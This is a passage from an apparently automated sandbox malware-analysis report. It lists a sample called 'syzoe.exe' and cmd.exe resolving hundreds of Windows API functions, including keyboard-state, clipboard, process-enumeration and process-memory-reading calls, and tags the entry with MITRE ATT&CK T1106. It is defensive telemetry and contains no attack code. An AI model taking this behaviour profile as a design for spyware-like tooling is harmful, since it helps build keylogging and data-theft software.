called \"GetProcAddress\" with a parameter GetMenuItemInfoW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetMenuItemID (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetMenuItemCount (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetMenu (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetLastActivePopup (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetKeyboardState (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetKeyboardLayoutNameW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetKeyboardLayoutList (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetKeyboardLayout (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetKeyState (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetKeyNameTextW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetIconInfo (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetForegroundWindow (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetFocus (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetDlgItem (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetDesktopWindow (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetDCEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetDC (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetCursorPos (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetCursor (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetClipboardData (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetClientRect (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetClassLongW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetClassInfoW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetCapture (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetActiveWindow (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FrameRect (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FindWindowExW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FindWindowW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FillRect (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter EnumWindows (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter EnumThreadWindows (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter EnumChildWindows (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter EndPaint (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter EnableWindow (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter EnableScrollBar (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter EnableMenuItem (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DrawTextExW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DrawTextW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DrawMenuBar (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DrawIconEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DrawIcon (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DrawFrameControl (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DrawFocusRect (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DrawEdge (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DispatchMessageA (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DispatchMessageW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DestroyWindow (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DestroyMenu (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DestroyIcon (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DestroyCursor (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DeleteMenu (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DefWindowProcW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DefMDIChildProcW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DefFrameProcW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreatePopupMenu (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateMenu (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateIcon (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateAcceleratorTableW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CopyIcon (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ClientToScreen (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CheckMenuItem (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CharUpperBuffW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CharNextW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CharLowerBuffW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CharLowerW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CallWindowProcW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CallNextHookEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter BeginPaint (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter AdjustWindowRectEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ActivateKeyboardLayout (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter MessageBoxA (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VerQueryValueW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter OpenPrinterW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter EnumPrintersW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DocumentPropertiesW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ClosePrinter (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetDefaultPrinterW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThreadPreferredUILanguages (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetThreadPreferredUILanguages (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThreadUILanguage (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceExW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VariantChangeTypeEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VarNeg (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VarNot (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VarAdd (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VarSub (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VarMul (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VarDiv (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VarIdiv (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VarMod (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VarAnd (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VarOr (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VarXor (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VarCmp (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VarI4FromStr (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VarR4FromStr (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VarR8FromStr (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VarDateFromStr (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VarCyFromStr (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VarBoolFromStr (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VarBstrFromCy (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VarBstrFromDate (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter VarBstrFromBool (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter WINNLSEnableIME (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoA (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GdiIsMetaPrintDC (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter AnimateWindow (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter UninitializeFlatSB (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollProp (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FlatSB_EnableScrollBar (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FlatSB_ShowScrollBar (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollRange (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollRange (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetLayeredWindowAttributes (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetFileSizeEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CoCreateInstanceEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CoAddRefServerProcess (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CoReleaseServerProcess (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CoResumeClassObjects (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CoSuspendClassObjects (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter OpenThemeData (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CloseThemeData (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DrawThemeBackground (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DrawThemeText (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemeBackgroundContentRect (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemeBackgroundExtent (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemePartSize (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemeTextExtent (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemeTextMetrics (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemeBackgroundRegion (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter HitTestThemeBackground (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DrawThemeEdge (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DrawThemeIcon (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter IsThemePartDefined (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter IsThemeBackgroundPartiallyTransparent (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemeColor (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemeMetric (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemeString (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemeBool (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemeInt (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemeEnumValue (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemePosition (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemeFont (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemeRect (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemeMargins (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemeIntList (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemePropertyOrigin (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetWindowTheme (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemeFilename (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemeSysColor (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemeSysColorBrush (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemeSysBool (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemeSysSize (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemeSysFont (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemeSysString (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemeSysInt (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter IsThemeActive (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter IsAppThemed (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetWindowTheme (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter EnableThemeDialogTexture (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter IsThemeDialogTextureEnabled (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemeAppProperties (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetThemeAppProperties (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetCurrentThemeName (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetThemeDocumentationProperty (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DrawThemeParentBackground (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter EnableTheming (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DrawThemeTextEx (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter HIMAGELIST_QueryInterface (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DrawShadowText (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DrawSizeBox (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DrawScrollBar (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SizeBoxHwnd (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ScrollBar_MouseMove (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ScrollBar_Menu (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter HandleScrollCmd (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter DetachScrollBars (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter AttachScrollBars (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CCSetScrollInfo (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CCGetScrollInfo (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CCEnableScrollBar (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter QuerySystemGestureStatus (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RegisterClassNameW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter RegisterDragDrop (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter WSAStartup (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetNameInfoW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FreeAddrInfoW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter InetPtonW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter InetNtopW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoExW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter SetAddrInfoExW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter FreeAddrInfoExW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter WSASetSocketPeerTargetName (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter WSADeleteSocketPeerTargetName (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter WSAImpersonateSocketPeer (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter WSAQuerySocketSecurity (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter WSARevertImpersonation (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter MonitorFromWindow (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CoRegisterInitializeSpy (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CoRevokeInitializeSpy (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter Heap32ListFirst (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter Heap32ListNext (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter Heap32First (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter Heap32Next (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter Toolhelp32ReadProcessMemory (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter Process32First (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter Process32Next (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter Process32FirstW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter Process32NextW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter Thread32First (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter Thread32Next (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter Module32Next (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter Module32FirstW (UID: 00000000-00000328)\n \"syzoe.exe\" called \"GetProcAddress\" with a parameter Module32NextW (UID: 00000000-00000328)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00000336)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SaferCloseLevel (UID: 00000000-00000336)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, 